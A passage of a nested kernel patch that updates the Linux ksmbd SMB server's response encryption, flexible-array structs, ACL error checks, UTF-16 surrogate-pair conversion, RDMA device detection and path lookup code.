+ 		memcpy(hdr->Signature, signature, SMB2_SIGNATURE_SIZE);
+ }
+ 
+@@ -8661,45 +8565,22 @@ static void fill_transform_hdr(void *tr_buf, char *old_buf, __le16 cipher_type)
+ 
+ int smb3_encrypt_resp(struct ksmbd_work *work)
+ {
+-	char *buf = work->response_buf;
+-	struct kvec iov[3];
++	struct kvec *iov = work->iov;
+ 	int rc = -ENOMEM;
+-	int buf_size = 0, rq_nvec = 2 + (work->aux_payload_sz ? 1 : 0);
+-
+-	if (ARRAY_SIZE(iov) < rq_nvec)
+-		return -ENOMEM;
++	void *tr_buf;
+ 
+-	work->tr_buf = kzalloc(sizeof(struct smb2_transform_hdr) + 4, GFP_KERNEL);
+-	if (!work->tr_buf)
++	tr_buf = kzalloc(sizeof(struct smb2_transform_hdr) + 4, GFP_KERNEL);
++	if (!tr_buf)
+ 		return rc;
+ 
+ 	/* fill transform header */
+-	fill_transform_hdr(work->tr_buf, buf, work->conn->cipher_type);
++	fill_transform_hdr(tr_buf, work->response_buf, work->conn->cipher_type);
+ 
+-	iov[0].iov_base = work->tr_buf;
++	iov[0].iov_base = tr_buf;
+ 	iov[0].iov_len = sizeof(struct smb2_transform_hdr) + 4;
+-	buf_size += iov[0].iov_len - 4;
+-
+-	iov[1].iov_base = buf + 4;
+-	iov[1].iov_len = get_rfc1002_len(buf);
+-	if (work->aux_payload_sz) {
+-		iov[1].iov_len = work->resp_hdr_sz - 4;
+-
+-		iov[2].iov_base = work->aux_payload_buf;
+-		iov[2].iov_len = work->aux_payload_sz;
+-		buf_size += iov[2].iov_len;
+-	}
+-	buf_size += iov[1].iov_len;
+-	work->resp_hdr_sz = iov[1].iov_len;
+-
+-	rc = ksmbd_crypt_message(work, iov, rq_nvec, 1);
+-	if (rc)
+-		return rc;
+-
+-	memmove(buf, iov[1].iov_base, iov[1].iov_len);
+-	*(__be32 *)work->tr_buf = cpu_to_be32(buf_size);
++	work->tr_buf = tr_buf;
+ 
+-	return rc;
++	return ksmbd_crypt_message(work, iov, work->iov_idx + 1, 1);
+ }
+ 
+ bool smb3_is_transform_hdr(void *buf)
+diff --git a/fs/smb/server/smb2pdu.h b/fs/smb/server/smb2pdu.h
+index 665a837378540..59e3de95961c1 100644
+--- a/fs/smb/server/smb2pdu.h
++++ b/fs/smb/server/smb2pdu.h
+@@ -446,7 +446,7 @@ struct smb2_posix_info {
+ 	/* SidBuffer contain two sids (UNIX user sid(16), UNIX group sid(16)) */
+ 	u8 SidBuffer[32];
+ 	__le32 name_len;
+-	u8 name[1];
++	u8 name[];
+ 	/*
+ 	 * var sized owner SID
+ 	 * var sized group SID
+@@ -488,6 +488,7 @@ int find_matching_smb2_dialect(int start_index, __le16 *cli_dialects,
+ struct file_lock *smb_flock_init(struct file *f);
+ int setup_async_work(struct ksmbd_work *work, void (*fn)(void **),
+ 		     void **arg);
++void release_async_work(struct ksmbd_work *work);
+ void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status);
+ struct channel *lookup_chann_list(struct ksmbd_session *sess,
+ 				  struct ksmbd_conn *conn);
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index adc41b57b84c6..d160363c09ebc 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -266,7 +266,7 @@ static int ksmbd_negotiate_smb_dialect(void *buf)
+ 		if (smb2_neg_size > smb_buf_length)
+ 			goto err_out;
+ 
+-		if (smb2_neg_size + le16_to_cpu(req->DialectCount) * sizeof(__le16) >
++		if (struct_size(req, Dialects, le16_to_cpu(req->DialectCount)) >
+ 		    smb_buf_length)
+ 			goto err_out;
+ 
+@@ -319,12 +319,6 @@ static int init_smb1_rsp_hdr(struct ksmbd_work *work)
+ 	struct smb_hdr *rsp_hdr = (struct smb_hdr *)work->response_buf;
+ 	struct smb_hdr *rcv_hdr = (struct smb_hdr *)work->request_buf;
+ 
+-	/*
+-	 * Remove 4 byte direct TCP header.
+-	 */
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(sizeof(struct smb_hdr) - 4);
+-
+ 	rsp_hdr->Command = SMB_COM_NEGOTIATE;
+ 	*(__le32 *)rsp_hdr->Protocol = SMB1_PROTO_NUMBER;
+ 	rsp_hdr->Flags = SMBFLG_RESPONSE;
+@@ -359,8 +353,8 @@ static int smb1_check_user_session(struct ksmbd_work *work)
+  */
+ static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
+ {
+-	work->response_buf = kmalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
+-			GFP_KERNEL | __GFP_ZERO);
++	work->response_buf = kzalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
++			GFP_KERNEL);
+ 	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
+ 
+ 	if (!work->response_buf) {
+@@ -571,10 +565,11 @@ static int smb_handle_negotiate(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
+ 
+-	/* Add 2 byte bcc and 2 byte DialectIndex. */
+-	inc_rfc1001_len(work->response_buf, 4);
+-	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
++	if (ksmbd_iov_pin_rsp(work, (void *)neg_rsp,
++			      sizeof(struct smb_negotiate_rsp) - 4))
++		return -ENOMEM;
+ 
++	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
+ 	neg_rsp->hdr.WordCount = 1;
+ 	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
+ 	neg_rsp->ByteCount = 0;
+diff --git a/fs/smb/server/smb_common.h b/fs/smb/server/smb_common.h
+index 1cbb492cdefec..f1092519c0c28 100644
+--- a/fs/smb/server/smb_common.h
++++ b/fs/smb/server/smb_common.h
+@@ -200,7 +200,7 @@ struct smb_hdr {
+ struct smb_negotiate_req {
+ 	struct smb_hdr hdr;     /* wct = 0 */
+ 	__le16 ByteCount;
+-	unsigned char DialectsArray[1];
++	unsigned char DialectsArray[];
+ } __packed;
+ 
+ struct smb_negotiate_rsp {
+@@ -263,14 +263,14 @@ struct file_directory_info {
+ 	__le64 AllocationSize;
+ 	__le32 ExtFileAttributes;
+ 	__le32 FileNameLength;
+-	char FileName[1];
++	char FileName[];
+ } __packed;   /* level 0x101 FF resp data */
+ 
+ struct file_names_info {
+ 	__le32 NextEntryOffset;
+ 	__u32 FileIndex;
+ 	__le32 FileNameLength;
+-	char FileName[1];
++	char FileName[];
+ } __packed;   /* level 0xc FF resp data */
+ 
+ struct file_full_directory_info {
+@@ -285,7 +285,7 @@ struct file_full_directory_info {
+ 	__le32 ExtFileAttributes;
+ 	__le32 FileNameLength;
+ 	__le32 EaSize;
+-	char FileName[1];
++	char FileName[];
+ } __packed; /* level 0x102 FF resp */
+ 
+ struct file_both_directory_info {
+@@ -303,7 +303,7 @@ struct file_both_directory_info {
+ 	__u8   ShortNameLength;
+ 	__u8   Reserved;
+ 	__u8   ShortName[24];
+-	char FileName[1];
++	char FileName[];
+ } __packed; /* level 0x104 FFrsp data */
+ 
+ struct file_id_both_directory_info {
+@@ -323,7 +323,7 @@ struct file_id_both_directory_info {
+ 	__u8   ShortName[24];
+ 	__le16 Reserved2;
+ 	__le64 UniqueId;
+-	char FileName[1];
++	char FileName[];
+ } __packed;
+ 
+ struct file_id_full_dir_info {
+@@ -340,7 +340,7 @@ struct file_id_full_dir_info {
+ 	__le32 EaSize; /* EA size */
+ 	__le32 Reserved;
+ 	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
+-	char FileName[1];
++	char FileName[];
+ } __packed; /* level 0x105 FF rsp data */
+ 
+ struct smb_version_values {
+diff --git a/fs/smb/server/smbacl.c b/fs/smb/server/smbacl.c
+index c24df86eb112b..d9bbd2eb89c35 100644
+--- a/fs/smb/server/smbacl.c
++++ b/fs/smb/server/smbacl.c
+@@ -97,7 +97,7 @@ int compare_sids(const struct smb_sid *ctsid, const struct smb_sid *cwsid)
+ 	/* compare all of the subauth values if any */
+ 	num_sat = ctsid->num_subauth;
+ 	num_saw = cwsid->num_subauth;
+-	num_subauth = num_sat < num_saw ? num_sat : num_saw;
++	num_subauth = min(num_sat, num_saw);
+ 	if (num_subauth) {
+ 		for (i = 0; i < num_subauth; ++i) {
+ 			if (ctsid->sub_auth[i] != cwsid->sub_auth[i]) {
+@@ -1185,8 +1185,7 @@ pass:
+ 			pntsd_size += sizeof(struct smb_acl) + nt_size;
+ 		}
+ 
+-		ksmbd_vfs_set_sd_xattr(conn, user_ns,
+-				       path->dentry, pntsd, pntsd_size);
++		ksmbd_vfs_set_sd_xattr(conn, user_ns, path, pntsd, pntsd_size, false);
+ 		kfree(pntsd);
+ 	}
+ 
+@@ -1313,7 +1312,7 @@ int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
+ 
+ 	if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
+ 		posix_acls = get_acl(d_inode(path->dentry), ACL_TYPE_ACCESS);
+-		if (posix_acls && !found) {
++		if (!IS_ERR_OR_NULL(posix_acls) && !found) {
+ 			unsigned int id = -1;
+ 
+ 			pa_entry = posix_acls->a_entries;
+@@ -1337,7 +1336,7 @@ int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
+ 				}
+ 			}
+ 		}
+-		if (posix_acls)
++		if (!IS_ERR_OR_NULL(posix_acls))
+ 			posix_acl_release(posix_acls);
+ 	}
+ 
+@@ -1378,7 +1377,7 @@ err_out:
+ 
+ int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+ 		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
+-		 bool type_check)
++		 bool type_check, bool get_write)
+ {
+ 	int rc;
+ 	struct smb_fattr fattr = {{0}};
+@@ -1406,7 +1405,7 @@ int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+ 	newattrs.ia_valid |= ATTR_MODE;
+ 	newattrs.ia_mode = (inode->i_mode & ~0777) | (fattr.cf_mode & 0777);
+ 
+-	ksmbd_vfs_remove_acl_xattrs(user_ns, path->dentry);
++	ksmbd_vfs_remove_acl_xattrs(user_ns, path);
+ 	/* Update posix acls */
+ 	if (IS_ENABLED(CONFIG_FS_POSIX_ACL) && fattr.cf_dacls) {
+ 		rc = set_posix_acl(user_ns, inode,
+@@ -1437,15 +1436,14 @@ int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+ 
+ 	if (test_share_config_flag(tcon->share_conf, KSMBD_SHARE_FLAG_ACL_XATTR)) {
+ 		/* Update WinACL in xattr */
+-		ksmbd_vfs_remove_sd_xattrs(user_ns, path->dentry);
+-		ksmbd_vfs_set_sd_xattr(conn, user_ns,
+-				       path->dentry, pntsd, ntsd_len);
++		ksmbd_vfs_remove_sd_xattrs(user_ns, path);
++		ksmbd_vfs_set_sd_xattr(conn, user_ns, path, pntsd, ntsd_len,
++				get_write);
+ 	}
+ 
+ out:
+ 	posix_acl_release(fattr.cf_acls);
+ 	posix_acl_release(fattr.cf_dacls);
+-	mark_inode_dirty(inode);
+ 	return rc;
+ }
+ 
+diff --git a/fs/smb/server/smbacl.h b/fs/smb/server/smbacl.h
+index 618f2e0236b31..9651a25518881 100644
+--- a/fs/smb/server/smbacl.h
++++ b/fs/smb/server/smbacl.h
+@@ -207,7 +207,7 @@ int smb_check_perm_dacl(struct ksmbd_conn *conn, const struct path *path,
+ 			__le32 *pdaccess, int uid);
+ int set_info_sec(struct ksmbd_conn *conn, struct ksmbd_tree_connect *tcon,
+ 		 const struct path *path, struct smb_ntsd *pntsd, int ntsd_len,
+-		 bool type_check);
++		 bool type_check, bool get_write);
+ void id_to_sid(unsigned int cid, uint sidtype, struct smb_sid *ssid);
+ void ksmbd_init_domain(u32 *sub_auth);
+ 
+diff --git a/fs/smb/server/transport_ipc.c b/fs/smb/server/transport_ipc.c
+index 40c721f9227e4..b49d47bdafc94 100644
+--- a/fs/smb/server/transport_ipc.c
++++ b/fs/smb/server/transport_ipc.c
+@@ -229,7 +229,7 @@ static struct ksmbd_ipc_msg *ipc_msg_alloc(size_t sz)
+ 	struct ksmbd_ipc_msg *msg;
+ 	size_t msg_sz = sz + sizeof(struct ksmbd_ipc_msg);
+ 
+-	msg = kvmalloc(msg_sz, GFP_KERNEL | __GFP_ZERO);
++	msg = kvzalloc(msg_sz, GFP_KERNEL);
+ 	if (msg)
+ 		msg->sz = sz;
+ 	return msg;
+@@ -268,7 +268,7 @@ static int handle_response(int type, void *payload, size_t sz)
+ 			       entry->type + 1, type);
+ 		}
+ 
+-		entry->response = kvmalloc(sz, GFP_KERNEL | __GFP_ZERO);
++		entry->response = kvzalloc(sz, GFP_KERNEL);
+ 		if (!entry->response) {
+ 			ret = -ENOMEM;
+ 			break;
+diff --git a/fs/smb/server/transport_rdma.c b/fs/smb/server/transport_rdma.c
+index 7578200f63b1d..c5629a68c8b73 100644
+--- a/fs/smb/server/transport_rdma.c
++++ b/fs/smb/server/transport_rdma.c
+@@ -1241,14 +1241,12 @@ static int smb_direct_writev(struct ksmbd_transport *t,
+ 
+ 	//FIXME: skip RFC1002 header..
+ 	buflen -= 4;
+-	iov[0].iov_base += 4;
+-	iov[0].iov_len -= 4;
+ 
+ 	remaining_data_length = buflen;
+ 	ksmbd_debug(RDMA, "Sending smb (RDMA): smb_len=%u\n", buflen);
+ 
+ 	smb_direct_send_ctx_init(st, &send_ctx, need_invalidate, remote_key);
+-	start = i = 0;
++	start = i = 1;
+ 	buflen = 0;
+ 	while (true) {
+ 		buflen += iov[i].iov_len;
+@@ -2142,8 +2140,7 @@ static int smb_direct_ib_client_add(struct ib_device *ib_dev)
+ 	if (ib_dev->node_type != RDMA_NODE_IB_CA)
+ 		smb_direct_port = SMB_DIRECT_PORT_IWARP;
+ 
+-	if (!ib_dev->ops.get_netdev ||
+-	    !rdma_frwr_is_supported(&ib_dev->attrs))
++	if (!rdma_frwr_is_supported(&ib_dev->attrs))
+ 		return 0;
+ 
+ 	smb_dev = kzalloc(sizeof(*smb_dev), GFP_KERNEL);
+@@ -2243,17 +2240,38 @@ bool ksmbd_rdma_capable_netdev(struct net_device *netdev)
+ 		for (i = 0; i < smb_dev->ib_dev->phys_port_cnt; i++) {
+ 			struct net_device *ndev;
+ 
+-			ndev = smb_dev->ib_dev->ops.get_netdev(smb_dev->ib_dev,
+-							       i + 1);
+-			if (!ndev)
+-				continue;
++			if (smb_dev->ib_dev->ops.get_netdev) {
++				ndev = smb_dev->ib_dev->ops.get_netdev(
++					smb_dev->ib_dev, i + 1);
++				if (!ndev)
++					continue;
+ 
+-			if (ndev == netdev) {
++				if (ndev == netdev) {
++					dev_put(ndev);
++					rdma_capable = true;
++					goto out;
++				}
+ 				dev_put(ndev);
+-				rdma_capable = true;
+-				goto out;
++			/* if ib_dev does not implement ops.get_netdev
++			 * check for matching infiniband GUID in hw_addr
++			 */
++			} else if (netdev->type == ARPHRD_INFINIBAND) {
++				struct netdev_hw_addr *ha;
++				union ib_gid gid;
++				u32 port_num;
++				int ret;
++
++				netdev_hw_addr_list_for_each(
++					ha, &netdev->dev_addrs) {
++					memcpy(&gid, ha->addr + 4, sizeof(gid));
++					ret = ib_find_gid(smb_dev->ib_dev, &gid,
++							  &port_num, NULL);
++					if (!ret) {
++						rdma_capable = true;
++						goto out;
++					}
++				}
+ 			}
+-			dev_put(ndev);
+ 		}
+ 	}
+ out:
+diff --git a/fs/smb/server/unicode.c b/fs/smb/server/unicode.c
+index a0db699ddafda..33fc6d45c0f38 100644
+--- a/fs/smb/server/unicode.c
++++ b/fs/smb/server/unicode.c
+@@ -14,46 +14,10 @@
+ #include "uniupr.h"
+ #include "smb_common.h"
+ 
+-/*
+- * smb_utf16_bytes() - how long will a string be after conversion?
+- * @from:	pointer to input string
+- * @maxbytes:	don't go past this many bytes of input string
+- * @codepage:	destination codepage
+- *
+- * Walk a utf16le string and return the number of bytes that the string will
+- * be after being converted to the given charset, not including any null
+- * termination required. Don't walk past maxbytes in the source buffer.
+- *
+- * Return:	string length after conversion
+- */
+-static int smb_utf16_bytes(const __le16 *from, int maxbytes,
+-			   const struct nls_table *codepage)
+-{
+-	int i;
+-	int charlen, outlen = 0;
+-	int maxwords = maxbytes / 2;
+-	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp;
+-
+-	for (i = 0; i < maxwords; i++) {
+-		ftmp = get_unaligned_le16(&from[i]);
+-		if (ftmp == 0)
+-			break;
+-
+-		charlen = codepage->uni2char(ftmp, tmp, NLS_MAX_CHARSET_SIZE);
+-		if (charlen > 0)
+-			outlen += charlen;
+-		else
+-			outlen++;
+-	}
+-
+-	return outlen;
+-}
+-
+ /*
+  * cifs_mapchar() - convert a host-endian char to proper char in codepage
+  * @target:	where converted character should be copied
+- * @src_char:	2 byte host-endian source character
++ * @from:	host-endian source string
+  * @cp:		codepage to which character should be converted
+  * @mapchar:	should character be mapped according to mapchars mount option?
+  *
+@@ -64,10 +28,13 @@ static int smb_utf16_bytes(const __le16 *from, int maxbytes,
+  * Return:	string length after conversion
+  */
+ static int
+-cifs_mapchar(char *target, const __u16 src_char, const struct nls_table *cp,
++cifs_mapchar(char *target, const __u16 *from, const struct nls_table *cp,
+ 	     bool mapchar)
+ {
+ 	int len = 1;
++	__u16 src_char;
++
++	src_char = *from;
+ 
+ 	if (!mapchar)
+ 		goto cp_convert;
+@@ -105,30 +72,66 @@ out:
+ 
+ cp_convert:
+ 	len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE);
+-	if (len <= 0) {
+-		*target = '?';
+-		len = 1;
+-	}
++	if (len <= 0)
++		goto surrogate_pair;
++
++	goto out;
++
++surrogate_pair:
++	/* convert SURROGATE_PAIR and IVS */
++	if (strcmp(cp->charset, "utf8"))
++		goto unknown;
++	len = utf16s_to_utf8s(from, 3, UTF16_LITTLE_ENDIAN, target, 6);
++	if (len <= 0)
++		goto unknown;
++	return len;
+ 
++unknown:
++	*target = '?';
++	len = 1;
+ 	goto out;
+ }
+ 
+ /*
+- * is_char_allowed() - check for valid character
+- * @ch:		input character to be checked
++ * smb_utf16_bytes() - compute converted string length
++ * @from:	pointer to input string
++ * @maxbytes:	input string length
++ * @codepage:	destination codepage
++ *
++ * Walk a utf16le string and return the number of bytes that the string will
++ * be after being converted to the given charset, not including any null
++ * termination required. Don't walk past maxbytes in the source buffer.
+  *
+- * Return:	1 if char is allowed, otherwise 0
++ * Return:	string length after conversion
+  */
+-static inline int is_char_allowed(char *ch)
++static int smb_utf16_bytes(const __le16 *from, int maxbytes,
++			   const struct nls_table *codepage)
+ {
+-	/* check for control chars, wildcards etc. */
+-	if (!(*ch & 0x80) &&
+-	    (*ch <= 0x1f ||
+-	     *ch == '?' || *ch == '"' || *ch == '<' ||
+-	     *ch == '>' || *ch == '|'))
+-		return 0;
+-
+-	return 1;
++	int i, j;
++	int charlen, outlen = 0;
++	int maxwords = maxbytes / 2;
++	char tmp[NLS_MAX_CHARSET_SIZE];
++	__u16 ftmp[3];
++
++	for (i = 0; i < maxwords; i++) {
++		ftmp[0] = get_unaligned_le16(&from[i]);
++		if (ftmp[0] == 0)
++			break;
++		for (j = 1; j <= 2; j++) {
++			if (i + j < maxwords)
++				ftmp[j] = get_unaligned_le16(&from[i + j]);
++			else
++				ftmp[j] = 0;
++		}
++
++		charlen = cifs_mapchar(tmp, ftmp, codepage, 0);
++		if (charlen > 0)
++			outlen += charlen;
++		else
++			outlen++;
++	}
++
++	return outlen;
+ }
+ 
+ /*
+@@ -158,12 +161,12 @@ static inline int is_char_allowed(char *ch)
+ static int smb_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+ 			  const struct nls_table *codepage, bool mapchar)
+ {
+-	int i, charlen, safelen;
++	int i, j, charlen, safelen;
+ 	int outlen = 0;
+ 	int nullsize = nls_nullsize(codepage);
+ 	int fromwords = fromlen / 2;
+ 	char tmp[NLS_MAX_CHARSET_SIZE];
+-	__u16 ftmp;
++	__u16 ftmp[3];	/* ftmp[3] = 3array x 2bytes = 6bytes UTF-16 */
+ 
+ 	/*
+ 	 * because the chars can be of varying widths, we need to take care
+@@ -174,9 +177,15 @@ static int smb_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+ 	safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize);
+ 
+ 	for (i = 0; i < fromwords; i++) {
+-		ftmp = get_unaligned_le16(&from[i]);
+-		if (ftmp == 0)
++		ftmp[0] = get_unaligned_le16(&from[i]);
++		if (ftmp[0] == 0)
+ 			break;
++		for (j = 1; j <= 2; j++) {
++			if (i + j < fromwords)
++				ftmp[j] = get_unaligned_le16(&from[i + j]);
++			else
++				ftmp[j] = 0;
++		}
+ 
+ 		/*
+ 		 * check to see if converting this character might make the
+@@ -191,6 +200,19 @@ static int smb_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
+ 		/* put converted char into 'to' buffer */
+ 		charlen = cifs_mapchar(&to[outlen], ftmp, codepage, mapchar);
+ 		outlen += charlen;
++
++		/*
++		 * charlen (=bytes of UTF-8 for 1 character)
++		 * 4bytes UTF-8(surrogate pair) is charlen=4
++		 * (4bytes UTF-16 code)
++		 * 7-8bytes UTF-8(IVS) is charlen=3+4 or 4+4
++		 * (2 UTF-8 pairs divided to 2 UTF-16 pairs)
++		 */
++		if (charlen == 4)
++			i++;
++		else if (charlen >= 5)
++			/* 5-6bytes UTF-8 */
++			i += 2;
+ 	}
+ 
+ 	/* properly null-terminate string */
+@@ -325,6 +347,9 @@ int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
+ 	char src_char;
+ 	__le16 dst_char;
+ 	wchar_t tmp;
++	wchar_t wchar_to[6];	/* UTF-16 */
++	int ret;
++	unicode_t u;
+ 
+ 	if (!mapchars)
+ 		return smb_strtoUTF16(target, source, srclen, cp);
+@@ -367,11 +392,57 @@ int smbConvertToUTF16(__le16 *target, const char *source, int srclen,
+ 			 * if no match, use question mark, which at least in
+ 			 * some cases serves as wild card
+ 			 */
+-			if (charlen < 1) {
+-				dst_char = cpu_to_le16(0x003f);
+-				charlen = 1;
++			if (charlen > 0)
++				goto ctoUTF16;
++
++			/* convert SURROGATE_PAIR */
++			if (strcmp(cp->charset, "utf8"))
++				goto unknown;
++			if (*(source + i) & 0x80) {
++				charlen = utf8_to_utf32(source + i, 6, &u);
++				if (charlen < 0)
++					goto unknown;
++			} else
++				goto unknown;
++			ret  = utf8s_to_utf16s(source + i, charlen,
++					UTF16_LITTLE_ENDIAN,
++					wchar_to, 6);
++			if (ret < 0)
++				goto unknown;
++
++			i += charlen;
++			dst_char = cpu_to_le16(*wchar_to);
++			if (charlen <= 3)
++				/* 1-3bytes UTF-8 to 2bytes UTF-16 */
++				put_unaligned(dst_char, &target[j]);
++			else if (charlen == 4) {
++				/*
++				 * 4bytes UTF-8(surrogate pair) to 4bytes UTF-16
++				 * 7-8bytes UTF-8(IVS) divided to 2 UTF-16
++				 * (charlen=3+4 or 4+4)
++				 */
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 1));
++				j++;
++				put_unaligned(dst_char, &target[j]);
++			} else if (charlen >= 5) {
++				/* 5-6bytes UTF-8 to 6bytes UTF-16 */
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 1));
++				j++;
++				put_unaligned(dst_char, &target[j]);
++				dst_char = cpu_to_le16(*(wchar_to + 2));
++				j++;
++				put_unaligned(dst_char, &target[j]);
+ 			}
++			continue;
++
++unknown:
++			dst_char = cpu_to_le16(0x003f);
++			charlen = 1;
+ 		}
++
++ctoUTF16:
+ 		/*
+ 		 * character may take more than one byte in the source string,
+ 		 * but will take exactly two bytes in the target string
+diff --git a/fs/smb/server/vfs.c b/fs/smb/server/vfs.c
+index 36914db8b6616..fe2c80ea2e47e 100644
+--- a/fs/smb/server/vfs.c
++++ b/fs/smb/server/vfs.c
+@@ -17,6 +17,7 @@
+ #include <linux/vmalloc.h>
+ #include <linux/sched/xacct.h>
+ #include <linux/crc32c.h>
++#include <linux/namei.h>
+ 
+ #include "../../internal.h"	/* for vfs_path_lookup */
+ 
+@@ -36,19 +37,6 @@
+ #include "mgmt/user_session.h"
+ #include "mgmt/user_config.h"
+ 
+-static char *extract_last_component(char *path)
+-{
+-	char *p = strrchr(path, '/');
+-
+-	if (p && p[1] != '\0') {
+-		*p = '\0';
+-		p++;
+-	} else {
+-		p = NULL;
+-	}
+-	return p;
+-}
+-
+ static void ksmbd_vfs_inherit_owner(struct ksmbd_work *work,
+ 				    struct inode *parent_inode,
+ 				    struct inode *inode)
+@@ -62,67 +50,96 @@ static void ksmbd_vfs_inherit_owner(struct ksmbd_work *work,
+ 
+ /**
+  * ksmbd_vfs_lock_parent() - lock parent dentry if it is stable
+- *
+- * the parent dentry got by dget_parent or @parent could be
+- * unstable, we try to lock a parent inode and lookup the
+- * child dentry again.
+- *
+- * the reference count of @parent isn't incremented.
+  */
+-int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
+-			  struct dentry *child)
++int ksmbd_vfs_lock_parent(struct dentry *parent, struct dentry *child)
+ {
+-	struct dentry *dentry;
+-	int ret = 0;
+-
+ 	inode_lock_nested(d_inode(parent), I_MUTEX_PARENT);
+-	dentry = lookup_one(user_ns, child->d_name.name, parent,
+-			    child->d_name.len);
+-	if (IS_ERR(dentry)) {
+-		ret = PTR_ERR(dentry);
+-		goto out_err;
+-	}
+-
+-	if (dentry != child) {
+-		ret = -ESTALE;
+-		dput(dentry);
+-		goto out_err;
++	if (child->d_parent != parent) {
++		inode_unlock(d_inode(parent));
++		return -ENOENT;
+ 	}
+ 
+-	dput(dentry);
+ 	return 0;
+-out_err:
+-	inode_unlock(d_inode(parent));
+-	return ret;
+ }
+ 
+-int ksmbd_vfs_may_delete(struct user_namespace *user_ns,
+-			 struct dentry *dentry)
++static int ksmbd_vfs_path_lookup_locked(struct ksmbd_share_config *share_conf,
++					char *pathname, unsigned int flags,
++					struct path *parent_path,
++					struct path *path)
+ {
+-	struct dentry *parent;
+-	int ret;
++	struct qstr last;
++	struct filename *filename;
++	struct path *root_share_path = &share_conf->vfs_path;
++	int err, type;
++	struct dentry *d;
++
++	if (pathname[0] == '\0') {
++		pathname = share_conf->path;
++		root_share_path = NULL;
++	} else {
++		flags |= LOOKUP_BENEATH;
++	}
++
++	filename = getname_kernel(pathname);
++	if (IS_ERR(filename))
++		return PTR_ERR(filename);
+ 
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
++	err = vfs_path_parent_lookup(filename, flags,
++				     parent_path, &last, &type,
++				     root_share_path);
++	if (err) {
++		putname(filename);
++		return err;
+ 	}
+ 
+-	ret = inode_permission(user_ns, d_inode(parent),
+-			       MAY_EXEC | MAY_WRITE);
++	if (unlikely(type != LAST_NORM)) {
++		path_put(parent_path);
++		putname(filename);
++		return -ENOENT;
++	}
+ 
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	return ret;
++	err = mnt_want_write(parent_path->mnt);
++	if (err) {
++		path_put(parent_path);
++		putname(filename);
++		return -ENOENT;
++	}
++
++	inode_lock_nested(parent_path->dentry->d_inode, I_MUTEX_PARENT);
++	d = lookup_one_qstr_excl(&last, parent_path->dentry, 0);
++	if (IS_ERR(d))
++		goto err_out;
++
++	if (d_is_negative(d)) {
++		dput(d);
++		goto err_out;
++	}
++
++	path->dentry = d;
++	path->mnt = mntget(parent_path->mnt);
++
++	if (test_share_config_flag(share_conf, KSMBD_SHARE_FLAG_CROSSMNT)) {
++		err = follow_down(path);
++		if (err < 0) {
++			path_put(path);
++			goto err_out;
++		}
++	}
++
++	putname(filename);
++	return 0;
++
++err_out:
++	inode_unlock(d_inode(parent_path->dentry));
++	mnt_drop_write(parent_path->mnt);
++	path_put(parent_path);
++	putname(filename);
++	return -ENOENT;
+ }
+ 
+-int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
++void ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
+ 				   struct dentry *dentry, __le32 *daccess)
+ {
+-	struct dentry *parent;
+-	int ret = 0;
+-
+ 	*daccess = cpu_to_le32(FILE_READ_ATTRIBUTES | READ_CONTROL);
+ 
+ 	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_WRITE))
+@@ -137,19 +154,8 @@ int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
+ 	if (!inode_permission(user_ns, d_inode(dentry), MAY_OPEN | MAY_EXEC))
+ 		*daccess |= FILE_EXECUTE_LE;
+ 
+-	parent = dget_parent(dentry);
+-	ret = ksmbd_vfs_lock_parent(user_ns, parent, dentry);
+-	if (ret) {
+-		dput(parent);
+-		return ret;
+-	}
+-
+-	if (!inode_permission(user_ns, d_inode(parent), MAY_EXEC | MAY_WRITE))
++	if (!inode_permission(user_ns, d_inode(dentry->d_parent), MAY_EXEC | MAY_WRITE))
+ 		*daccess |= FILE_DELETE_LE;
+-
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	return ret;
+ }
+ 
+ /**
+@@ -185,6 +191,7 @@ int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode)
+ 	} else {
+ 		pr_err("File(%s): creation failed (err:%d)\n", name, err);
+ 	}
++
+ 	done_path_create(&path, dentry);
+ 	return err;
+ }
+@@ -218,27 +225,26 @@ int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode)
+ 	user_ns = mnt_user_ns(path.mnt);
+ 	mode |= S_IFDIR;
